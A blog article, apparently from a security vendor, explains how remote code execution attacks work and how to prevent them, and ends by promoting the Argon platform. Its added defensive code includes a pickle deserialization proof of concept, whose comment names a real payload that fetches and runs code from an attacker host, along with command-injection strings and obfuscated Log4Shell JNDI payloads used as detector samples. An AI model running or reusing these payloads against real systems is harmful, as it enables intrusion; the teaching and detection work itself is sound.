The Step-by-Step Guide to Preventing Remote Code Execution (RCE)

Guy Ben-Aharon
Jan 12 · 7 min read

A 2017 cyber attack affected more than 200,000 computers across the globe, causing damages estimated in the hundreds of millions of dollars, and it was one of the largest remote code execution (RCE) attacks ever reported. The attackers encrypted critical files and locked owners out of their machines while demanding a ransom in exchange for decrypting the files. The incident, known as the WannaCry ransomware attack, spread from machine to machine without any user interaction by exploiting an RCE vulnerability in Windows' SMB file-sharing service, and it showed what havoc RCE attacks can wreak.

In recent weeks, a critical RCE vulnerability in Log4j, a widely used open-source Java logging library, has been exploited in malicious attacks. The flaw, commonly called Log4Shell, is triggered when attacker-controlled text containing a JNDI lookup such as ${jndi:ldap://...} is written to a log, which means any field an application logs (a User-Agent header, a username, a query parameter) becomes an attack surface. It has become such a significant threat that global behemoths such as Microsoft are issuing threat advisories and guidance on preventing the Log4j RCE.

Today, RCE is the most commonly observed attack type according to the 2020 Global Threat Intelligence Report, which attributes 15% of all attacks to it. The 2020 Vulnerability Statistics report likewise showed RCE's share of observed attacks rising from 7% in 2019 to 27% in Q2 2020.

Take a look at the below chart of different attack types in Q2 2020.


What is an RCE attack?

Remote Code Execution (RCE) is a class of vulnerability that allows an attacker to run code of their choosing on your machine or server without having prior access to it. It is the networked form of Arbitrary Code Execution (ACE): the attacker never needs to be at the keyboard. It is rated a high-risk vulnerability because a single crafted request can turn into full compromise of the affected process, and because the exploitation often leaves little trace in application logs. Contrary to a common misconception, RCE does not require the victim to download anything: it is triggered when attacker-controlled input, such as a request parameter, a header, a file or a serialized object, reaches a vulnerable code path, which is why it can be exploited from any geographic location.

In a Remote Code Execution (RCE) attack, the attacker sends crafted input to your device or server from anywhere in the world and gets it to execute their commands. It is among the most dangerous forms of attack because the attacker's code runs with the privileges of the compromised process. If that process runs as an administrator, SYSTEM or root, the attacker immediately has absolute control of the computer, including its applications and services; if it runs as a less privileged account, the attacker typically chains a privilege escalation to get there.

An RCE attack is usually preceded by a scanning phase in which the attacker probes exposed services and applications to detect software vulnerabilities. The vulnerabilities found are then exploited to intrude into the system and, wherever possible, to gain administrative access. Once inside the computer, the attacker can steal confidential data, edit or delete files, deploy ransomware, or enlist the machine in Distributed Denial of Service (DDoS) attacks, among other things.

An RCE attack, simply speaking, exploits a pre-existing flaw in how a program handles untrusted input, so that data the attacker supplies ends up being executed as code. The most commonly abused gaps are described below.


2 Common Types of RCE Techniques

RCE vulnerabilities are commonly grouped into two categories, Web-based and System-based, according to where the vulnerable code lives. Let’s take a quick look at these two categories.

  1. Web-based RCE: This is a vulnerability in a web application or the framework it is built on that lets attackers run code on the web server. The payload arrives as ordinary web input (a GET query string, a POST body, a cookie, a header or an uploaded file) and reaches a dangerous sink such as an eval() call, a shell command, a template engine or a deserializer. Two patterns account for most cases:
    • Unvalidated request input: the application builds a command, query, expression or template from a request parameter without validating it, so whatever the client sends is executed. A failure in user input validation is the root cause.
    • Framework or library flaws: the application code is careful, but a component it relies on (a logging library such as Log4j, a deserialization library, a template engine) executes attacker-controlled data on its behalf. Poorly maintained applications that lag behind on patches are the usual targets.
  2. System-based RCE: This is a vulnerability in a network-facing service or operating-system component on Windows, macOS, Linux or Android. These are most often memory-corruption bugs such as buffer overflows (WannaCry's SMB exploit is the classic example), and publicly available exploit kits make them easy to weaponize. SQL injection is sometimes listed here as well; by itself it is a data-access flaw, but it turns into RCE when the database server exposes a way to run commands or write files.

5 Causes of RCE Attacks

1. Dynamic Code Execution

Most programming languages let a program build code at run time and execute it, through facilities such as eval(), exec(), a scripting engine or a template renderer, which gives developers a seamless and quick way to extend behaviour. This is one of the most powerful concepts available for tackling software complexity. The problem arises when the code that gets built depends on input from the client.

Once attackers find such a code path, they can embed their own statements in the input so that they are executed alongside, or instead of, the code the developer intended. That code runs on your machine with the application's privileges and compromises its security.

Since dynamic code execution is so widely used in software development, it is also a highly targeted attack vector. Two classes of dynamic-execution flaws facilitate an RCE attack:

Direct RCE Attack

In this case the client’s input is passed straight to the evaluation function, so the attacker can be certain that whatever code they embed will be executed as-is on the target system.

Indirect RCE Attack

Here, the client’s input passes through multiple layers (formatting, concatenation into a larger expression, templating) before it reaches the evaluation function, and each layer alters it. In some cases the dynamic code is not even a deliberate feature but an unintended byproduct of how the program assembles strings. The attacker has to craft input that survives the transformations and still closes off the surrounding code correctly, but once they do, the injected code runs just the same.

2. Deserialization

Serialization converts complex data structures such as objects and primitive data fields into a byte stream (binary or text) so that they can be stored or transmitted; deserialization rebuilds the original objects once the data reaches the destination. The conversion becomes a vulnerability when the stream comes from an untrusted source and the deserializer reconstructs whatever classes the stream names, because an attacker can craft a stream that instantiates classes whose constructors, callbacks or reduce hooks run arbitrary code while the data is being loaded. Java's native serialization, Python's pickle and .NET's BinaryFormatter all behave this way, which is why none of them should ever be used on data an attacker can influence.
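An added example of the deserialization flaw using Python's pickle, not code from the original article: the malicious stream is built by a class whose __reduce__ hook names a callable for the unpickler to run (os.getpid here as a harmless stand-in for os.system), and the hardened loader is a restricted Unpickler that refuses to resolve any global the stream asks for. The payload contents, the data shape and the function names are assumptions for the illustration.

```python
import io
import os
import pickle


# --- What the attacker serializes -------------------------------------------
# pickle lets any object dictate how it is rebuilt through __reduce__(): it
# returns a callable plus arguments, and pickle.loads() calls them. A real
# payload would return (os.system, ("curl http://attacker/x | sh",)); this
# constructed proof returns os.getpid so that "code ran" is visible without
# side effects.
class MaliciousObject:
    def __reduce__(self):
        return (os.getpid, ())


def build_malicious_payload() -> bytes:
    return pickle.dumps(MaliciousObject())


def build_legitimate_payload() -> bytes:
    # The kind of data the application actually expects: containers of scalars.
    return pickle.dumps({"user": "alice", "roles": ["reader"]})


# --- Vulnerable: trust the bytes ----------------------------------------------
def unsafe_load(data: bytes):
    return pickle.loads(data)  # calls os.getpid() here; would call os.system() for real


# --- Hardened: an Unpickler that refuses to resolve globals --------------------
# Every class or function the stream references goes through find_class().
# Allowing nothing is right for data that should be pure containers (dicts,
# lists, strings, numbers need no globals); add (module, name) pairs only for
# the specific types the application genuinely needs to rebuild.
class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED_GLOBALS = frozenset()  # e.g. {("myapp.models", "Session")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    payload = build_malicious_payload()
    print("unsafe_load ran attacker code; it returned our PID:", unsafe_load(payload))
    print("safe_load on legitimate data:", safe_load(build_legitimate_payload()))
    try:
        safe_load(payload)
    except pickle.UnpicklingError as exc:
        print("safe_load blocked it:", exc)
```

The restricted unpickler is a mitigation for code that cannot drop pickle; the better fix is to exchange untrusted data in a format that carries no class names at all, such as JSON validated against a schema, since the Python documentation itself warns that pickle is not secure against erroneous or maliciously constructed data.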

3. Memory Safety

A running process keeps its program code, its data and the bookkeeping that ties them together (return addresses, function pointers, heap metadata) in memory. A memory-safety bug, such as an out-of-bounds write or a use-after-free, lets attacker-controlled data reach parts of memory it should never touch. Exploiting such a bug to redirect control flow produces the most disastrous RCE attacks, because no interpreter or deserializer is involved: the attacker takes over the native process directly.

More often than not, memory-safety vulnerabilities arise from flaws in code written in memory-unsafe languages such as C and C++, whether in a virtual machine, a compiler, an operating system kernel or a library. The most common such flaw, and the one RCE attackers target most, is the buffer overflow.

4. Buffer Overflow

A buffer is a region of memory with a fixed capacity that holds data temporarily. If the program copies data into it without bounds checking, anything beyond the buffer's capacity spills into adjacent memory and overwrites it. At best this corrupts critical data and crashes the program; at worst the attacker uses the overwrite to plant code, or to replace a saved return address or function pointer, so that execution jumps to code they control.

Other vulnerability classes can also be abused to execute an RCE attack.

5. Type Confusion

This vulnerability occurs when a program accesses an object as if it were of a type other than the one it actually has, typically through an unchecked cast or a missing type check at the boundary where objects pass between components. The object's memory is then interpreted with the wrong layout, so a field the attacker controls (an integer, say) can be treated as a pointer or a length. That gives the attacker an out-of-bounds read or write and, from there, a way to execute code in place of the actual program. Type confusion is a frequent root cause of RCE in browser JavaScript engines and other just-in-time compiled environments.

Step by Step Guide to Prevent RCE Attacks

RCE attacks are complex and can have disastrous consequences. Attackers don’t follow a fixed process, and with new vulnerabilities constantly showing up, fully proofing a system against such attacks is difficult. Nonetheless, implementing a few preventive measures greatly reduces the chances of a successful RCE attack.

1. Keep Software Up-to-date

Vulnerabilities in software are a very common occurrence, but vendors release regular updates and patches to fix them. Keeping your software up to date and applying patches as soon as vendors make them available will stop the large majority of RCE attacks, which rely on known vulnerabilities: WannaCry spread through a flaw for which Microsoft had shipped a patch roughly two months earlier. This applies just as much to the open-source libraries bundled inside your own applications, as the Log4j case shows, so keep an inventory of which versions of which components each application ships with.

Many organizations postpone software updates and regular patching because they can cause downtime and other functionality issues, which translate into productivity losses. However, by not updating the software, you leave your systems open to attackers, which could result in loss of personal data, money and reputation.

2. Plug Buffer Overflow Gaps

We discussed earlier how a buffer overflow lets malicious parties take over a process. Modern compilers plug much of this gap for you. With stack protection enabled (GCC's and Clang's -fstack-protector-strong, which several Linux distributions turn on by default), the compiler places a canary, a random value chosen when the process starts, between a function's local buffers and its saved return address, and checks it before the function returns. If an overflow has overwritten the canary, the process is aborted instead of jumping to the attacker's address. Canaries only catch contiguous stack overwrites, so enable them together with the platform's other mitigations (address space layout randomization, non-executable stacks), fix the underlying bounds-checking bugs rather than relying on the check, and prefer memory-safe languages for new code.

3. Verify User Input Validation

User inputs give attackers an easy way into your systems, so it is wise to distrust every input. Validate it before it reaches any code, command, query or template, by checking that it fits pre-defined criteria such as format, length, character set and numeric range. Validate against an allowlist of what is expected rather than a denylist of known-bad strings, and then hand the validated value to APIs that do not reinterpret it: parameterized queries instead of string-built SQL, argument arrays instead of shell command lines, and no eval() at all.
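An added example of allowlist validation in Python (not code from the original article), for a hypothetical "ping this host" feature, which is a classic command-injection path to RCE. The host-name allowlist, the length cap and the function names are assumptions for the illustration; the vulnerable function shows the shell string that an unvalidated value would turn into.

```python
import re
import subprocess

# Assumed allowlist: RFC 1123 host names and dotted IPv4 literals, nothing else.
MAX_HOST_LEN = 253
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def validate_host(value: str) -> str:
    """Return the host unchanged if it matches the allowlist, else raise ValueError."""
    if not isinstance(value, str):
        raise ValueError("host must be a string")
    if len(value) == 0 or len(value) > MAX_HOST_LEN:
        raise ValueError("host length out of range")
    # The regexes already forbid a leading '-', but the check is kept explicit:
    # option injection ("-f", "--interval=0") is the usual next trick once a
    # shell is out of the picture.
    if value.startswith("-"):
        raise ValueError("host must not look like a command-line option")
    if _IPV4.match(value) or _HOSTNAME.match(value):
        return value
    raise ValueError("host contains characters outside the allowlist")


# Vulnerable: the raw value is spliced into a command line. Run with
# subprocess.run(cmd, shell=True), "example.com; id" executes ping and then id,
# and "$(id)" executes id too.
def unsafe_ping_command(host: str) -> str:
    return f"ping -c 1 {host}"


# Hardened: validate first, then build an argument vector. subprocess passes
# each element to ping as-is; no shell ever parses the string.
def safe_ping_argv(host: str) -> list:
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> int:
    """Run the validated command and return its exit status."""
    completed = subprocess.run(safe_ping_argv(host), capture_output=True, timeout=10)
    return completed.returncode


if __name__ == "__main__":
    print(safe_ping_argv("example.com"))
    print(unsafe_ping_command("example.com; id"))  # what the attacker's input becomes
    for bad in ("example.com; id", "$(id)", "example.com`id`", "-f", "a" * 300):
        try:
            safe_ping_argv(bad)
        except ValueError as exc:
            print(f"rejected {bad[:20]!r}: {exc}")
```

The two halves are complementary: the allowlist stops the injection characters, and the argument vector means that even a future gap in the allowlist cannot become a shell command. Do the validation at the boundary where the input enters and keep the validated value in a distinct variable, so that later code cannot accidentally pick up the raw one.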

4. Install a Firewall

Installing a Web Application Firewall (WAF) in front of your applications is a worthwhile investment, as it blocks the automated, mass-scanning RCE attempts that make up most of the hostile traffic; the Log4j scanning waves are a current example. It works like the firewall you install on your personal computer, except that it inspects HTTP requests for known attack patterns rather than ports. Treat it as a layer and not as a fix: attackers routinely obfuscate payloads to get past signature rules, so the vulnerable code still has to be patched.

5. Use Access Control Lists

By using Access Control Lists (ACLs) and, more generally, the principle of least privilege, you limit what each user and service account can reach, and therefore how far an attacker gets even if there is a security breach. Run web applications and services under dedicated unprivileged accounts rather than root or SYSTEM, so that code executed through an RCE bug inherits only that account's rights, and restrict those accounts' file-system and network access to what the service needs. It is worth putting in the time and effort to configure ACLs properly for your organization.

6. Leverage Detection Software

As an extra layer of security, invest in detection tooling. These tools scan the traffic to, and the logs from, your properties for suspicious activity: exploit payloads in requests, unexpected child processes spawned by a web server, or outbound connections from servers that should never initiate any. When a threat is detected, the tool blocks the suspicious host, stopping a potential attack in its early stages.

Numerous threat detection tools are available today, both proprietary and open-source, such as Argon.
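As an added example (not code from the original article or from Argon), here is the kind of rule a WAF or a log-scanning detector would apply to the Log4j payloads mentioned at the start of this article, covering both the firewall and the detection-software points above. Attackers disguise the ${jndi:...} lookup by nesting other Log4j lookups (${lower:j}, ${::-j}, ${env:NaN:-j}) and by URL-encoding it, so the detector normalizes those forms before matching. The access-log lines are constructed for the illustration, not real traffic, and the lookup emulation covers only the obfuscations listed in the code.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: one with no further braces inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_ROUNDS = 20   # bound on nesting depth so crafted input cannot keep us looping


def _resolve_lookup(body: str):
    """Emulate the Log4j lookups attackers nest to disguise 'jndi'.
    Returns the substituted text, or None when the lookup is not one of them."""
    low = body.lower()
    if low.startswith("jndi:"):
        return None                          # the real sink: leave it for the detector
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                         # ${unresolvable:-default} yields "default"
        return body.rsplit(":-", 1)[1]
    return None                              # ${date:yyyy}, ${env:HOME}, ... left alone


def normalize(text: str) -> str:
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(MAX_ROUNDS):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indices of the lines that carry a JNDI lookup once de-obfuscated."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed access-log sample: a benign request, three probes (plain, nested
# lookups, URL-encoded in the query string) and a benign non-JNDI lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(f"line {i} is a probe; normalized: {normalize(SAMPLE_LOG[i])}")
```

Even with the normalization, a signature like this is evidence, not protection: attackers invent new encodings faster than rules are written, which is exactly why a WAF or detector is the extra layer and patching the library is the fix. A match from an internal address, or a matching request that was answered with 200 rather than 404, is the signal worth escalating.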

Protecting Your Web Apps from RCE Attacks with Argon

Argon is an industry-first holistic security platform that addresses multiple threat vectors affecting the software supply chain. It is lightweight and comes with flexible deployment options. The software is application-aware, which means it monitors traffic to your web applications and identifies which applications are in play. Argon also supports multithreading, service identification, and a straightforward rule language.

Argon can add significant value to your organization by helping to prevent RCE attacks while maintaining security, usability, and efficiency.
